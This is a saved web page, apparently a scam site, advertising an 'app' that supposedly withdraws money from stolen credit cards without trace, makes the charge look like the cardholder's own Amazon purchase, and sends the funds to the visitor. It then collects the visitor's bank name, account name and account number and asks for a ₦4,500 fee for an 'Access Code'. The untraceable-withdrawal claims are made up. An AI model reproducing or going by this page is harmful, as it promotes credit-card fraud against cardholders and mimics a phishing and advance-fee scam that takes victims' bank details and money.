<!DOCTYPE html>
<!-- saved from url=(0043)https://amazon-x-cards.vercel.app/view.html -->
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>VIEW</title>
</head>
<body>
    <style>
        body {
            background: #f5f0f0;
        }
        .box {
            width: 90%;
            height: fit-content;
            margin: 0 auto;
            background: white;
            margin-top: 2%;
            border-radius: 10px;

        }
        .box p {
            padding-left: 19px;
            font-size: larger;
        }
        .box h1 {
            padding-left: 19px;
        }
        .box button {
            width: 190px;
            height: 34px;
            margin: 0 auto;
            display: block;
            border: none;
            background: #997a7a;
        }
        .box a {
            font-size: larger;
            color: white;
            text-decoration: none;
        }
            input, select {
                width: 80%;
                height: 35px;
                margin: 0 auto;
                border: 1px solid rgb(87, 112, 48);
                /* padding: 3px 2px; */
                margin: 0 auto;
                display: block;
            }
    </style>
    <div class="box"> <br> <br>
       <h1>Thinking of getting Caught?</h1>
       <p>our aplication divert all transaction! you are not getting caught becouse our App getway API block all trace</p>


       <p>in details <br>
       our app Withdraw the money from the Card (  C.C ) and store it on ourSystemStorage wallet and automatic send the money to your account
    </p>
    <p> At the point of trace, you account will not be displayed there, why? because the money was Withdrawn to our own SystemStorage wallet API
    </p>
    <p>At the point of investication it will shown that the owner of the card purchased an item with it on an amazon store. 
        the owner of the card will be told to keep is card safe next time!, wisdom!</p>
        <p>that why we advice you to Withdraw the sum of 100k below cause our SystemStorage can'ts store alot of funds</p>

        <p>Go make a transaction now</p> <br>

        <p>Please provide a bank account in which you will be using for your own payments 
             make sure you know that this account you provided is the only account you will use for this payments to purchase your own Access Code 
            pay to the app and get your account save to our server
        </p>
        <form action="payment_page2.html" method="get">
            <input type="text" name="" placeholder="Bank Name"> <br>
            <input type="text" placeholder="Account Name" required=""> <br> 
            <input type="text" placeholder="Account Number" required=""> <br> 
         <button>Pay Now ₦4,500</button>
        </form>
<br> <br> <br> <br>
        
    </div>


</body></html>